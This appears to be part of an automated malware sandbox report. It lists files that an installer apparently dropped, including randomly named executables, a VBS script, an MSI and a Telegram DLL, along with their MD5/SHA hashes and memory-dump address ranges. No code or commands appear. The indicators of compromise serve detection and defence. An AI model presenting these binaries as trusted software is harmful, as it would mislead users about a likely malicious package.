SHA1 b861a2f9153be144bd3ec8d97fa298727cc6b817
SHA256 0f04578df48d9bfaccd14d60dcb6e9d749f67e0d61ce669f8ca1cba185e53533
SHA512 166b2c04e1e11aad5ee9ba5207183c3f4a73991ea53545bbeb569ea28fe8bd8784df93b83f279d8f33391dfcd69c5a69dd6fb3454626d513a0a70f7356c3da3b

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

MD5 c31c4b04558396c6fabab64dcf366534
SHA1 fa836d92edc577d6a17ded47641ba1938589b09a
SHA256 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg

MD5 86e0062ac9e3c38a69470a57bb619533
SHA1 7d04a283f51e145724e20a5925ee811a4645e5d9
SHA256 42a64f04499a0836946073eb7bfc1cb67a98faa58d65eeb09fb6ac8fccc7f547
SHA512 aefc23fcf566748b60de0e95268f834cef3e4cfb1754b18e9ea2e1a867a764d027d43c68aad2b7c3f4520b3232fd50430c2b7fb4494dee223ac340a8c1e67794

C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf

MD5 17f3ece27717fa4a5ad13f06e6c2846e
SHA1 47b8230c0f0dd0b8a451bd378203a0ec0aaa13f6
SHA256 f0217b72add9c431299fda7983e8a7c592f6b4cd5a1df5118208c19dc7251c86
SHA512 998dcba619566edba18b2dcaefd8e86d1d6c09340c8004cf487d6944bb2a90b75231f2d3140162bcf0a161321d5febccf7d947d4752451424082f3cd06de9b7b

C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe

MD5 90134a5b913cd5d9d993f6f58601740e
SHA1 c6fc923eae06097227dab095633a0c47beba327a
SHA256 8462d6b3f1a8037f6f60412d3f4e0ecad89aaed3c10915ffa1e602c5ae8b0942
SHA512 7385ebcce7e33efb3a9b26d9690d8a2a221bc05071bc499f313de2de8d31935dd0cdd366ac7baccd4004d9e1eb27a0471328785ad1acf325054fd036d4b9dd61

C:\Program Files\SustainSleekTutor\tsetup.exe

MD5 8a53cf72375f6899082463c36422d411
SHA1 161d9d3b21bf0d9a9790b92013ec76c6d839af06
SHA256 1b31e3758c4b158143dc41c7c4617984d958760d8d7718e1e38492c67f6bbf65
SHA512 daadba04fb90002a2cb8e44c1b98d6bf702b9cfe33d3b6dc981c877e0a77c620f2538a2748f2fb4e88493e326cc45764c54dad659d8d2d018b74b24fd727a190

memory/2556-56-0x0000000029A90000-0x0000000029ABF000-memory.dmp

memory/1440-59-0x0000000000400000-0x00000000004D4000-memory.dmp

C:\Windows\Installer\e57b805.msi

MD5 7ba3fd79c3ccfdb9f1a311a3f05a7d94
SHA1 c4115a8d08ce102bcb14ed00dad86e52e163c81c
SHA256 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf
SHA512 f491a16cc375d6756e2debed08e76f01c090ae52b16e7b3eeed2930e0eb8e47e56aada96b54a6dfaa212354d66ca92955a4fc39434a378429f54416f5043048c

C:\Config.Msi\e57b806.rbs

MD5 6f1d258ed53343d54331cf70ff3ed7a9
SHA1 9475f6a4c5106b539108727be0732961ed112583
SHA256 5fc9dddaa2f55e79886a7a3e856aecba74e31f5a36e354adef118f4ad325ed0d
SHA512 6c227d6af836c57ee5e3bd64524f5faf1e56983062f705123201ba83bc261aca3883f41fb650813454aca243d641a25799a0e867c9ee5649bf59bda7a31a5ad0

C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp

MD5 d90927477dbf0725af0a10e151c184c4
SHA1 4cd69b23ee9c1efe9bd539f0fef841a09a4a773e
SHA256 43182a0ae7e22cc7f9b8028dc71e82826c80e9ac265f8d2dfa08876bb41b7029
SHA512 bfbd62482e99127c1bf621a135b464b5f96b86adfcb9064660c0dc1052099643ea9485e1358a758ab466f19c97042dafccb781e157203ea51e43956e4b6f4f98

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe

MD5 d305d506c0095df8af223ac7d91ca327
SHA1 679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a
SHA256 923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66
SHA512 94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs

MD5 615235ef40ac677be4c414e7dfb9ff53
SHA1 ef7cea67851aed94a5e14e9b907f366d1185e172
SHA256 1a7dd87bb537e41f7742da7cbb9839523d905747aad4522f4a39932ba626a132
SHA512 c694a4cf03ce5587e164b4f31b141951b949281f8ba08a69178f56c290afbbbe139651a849f3436976ee7c29b6aa0408b60c7e529a44c8c4bc52aff0498ae89b

memory/4060-80-0x0000000000760000-0x0000000000836000-memory.dmp

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml

MD5 a64dd3b12bb2c5bc00fb61a6c9ddcc8d
SHA1 27b65d6e3c47cefd0d21e9412185601d03a2756f
SHA256 73c03e24b2378cd1a660ac8127f44edae43ee31a73092afb88bd617b9638db9f
SHA512 8824bb6e846c9ee4e5ef3bf0373dcd0b513aa5f91d3858a5e34868b1f72f7052dc55776d0cd40154fe4f1dc160ea7d7324872e6e7e8a265db294e53f36878e39

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UhHKDmESOIjj.exe.log

MD5 122cf3c4f3452a55a92edee78316e071
SHA1 f2caa36d483076c92d17224cf92e260516b3cbbf
SHA256 42f5774d1ee4cae5d7a4e83970da42bb17e61ae93c312247211b5ee3535662e0
SHA512 c98666fb86aaff6471c0a96f12f037b9a607579c5891c9d7ba8cd4e90506ca7aa5b5f6264081d25f703c88fb69d8e2cd87809d508e771770550d0c5d4d17d91c

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 4e14ff5f867de1777b6aae7a48fe1c3f
SHA1 17d8f1b5b4bc4c9517e9c1e412c7f4e488e7be1e
SHA256 ac2082ba3c3e67110f6bc8744b93b1990c0b5514122b2c64fe99e3fa18432f74
SHA512 7f013d0ec64f226896177a455d7951358f2bb99c51ebd5be7e9e7dffaa048294b384cde65b609eaa09adb3c4372aead5edb623c89a37de5275d213ac852c4038

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 7f378affecbfdafd347579ead10eb494
SHA1 9c8c93a6198d044716bc7fed12ca0728bd4e7f4e
SHA256 7788cb38dd7f69889108d8043a0a642b87a20bd6a6cc215e8ef753e39906a7ab
SHA512 2ce6a99b54dcb6179e23e44a1fbd765326ad5891e859d1493647a2dc9bb5103ca5a595458e5ad31f6f25a1426c096df48e0b430e4daf8dd854928ff066310258

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 c01617b7e98a81d6b5d97283db538ee8
SHA1 f4b9e42359f7c6a19bd8cd73fad8ad20151c5d90
SHA256 935799d2ea92630d9dd31ff897df8ed66f5703830ddd4fe6797f739dbc0e2249
SHA512 af39c698b9197d9081f163f523b6079b48a4f852d5a7fb45a445d6d7b6c3a6cc031fbbadd0ea1cd865bd0a39bc78f0e0692c09b1a952ff2fb350293b3ba494fe

C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log

MD5 a8a628af93c38728740972e112c50971
SHA1 519706dcfe4462e3a70ff8fb9ad983cfded94e78
SHA256 441c3e40d60b2e7785c935b75657b55cc289cfab8c6cf1cc032202108e0ba30c
SHA512 0e3ba923a4e8d4d34fbae9c80a4311f1ca4fb9432865e33ffc349f5b91f4051c588514233ac69e02ce0aefdd763baf6d0827f5eb25376383056299192b6a43cf

memory/3492-111-0x000000002A290000-0x000000002A2DD000-memory.dmp

memory/1440-112-0x0000000000400000-0x00000000004D4000-memory.dmp

memory/2052-113-0x0000000000400000-0x0000000000710000-memory.dmp

memory/3492-114-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/3492-117-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/3492-116-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/3492-118-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/3492-121-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/2052-124-0x0000000000400000-0x0000000000710000-memory.dmp

memory/3492-125-0x000000002BEC0000-0x000000002C07C000-memory.dmp

memory/2052-133-0x0000000000400000-0x0000000000710000-memory.dmp

C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll

MD5 a7349236212b0e5cec2978f2cfa49a1a
SHA1 5abb08949162fd1985b89ffad40aaf5fc769017e
SHA256 a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082
SHA512 c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

memory/2052-158-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1440-159-0x0000000000400000-0x00000000004D4000-memory.dmp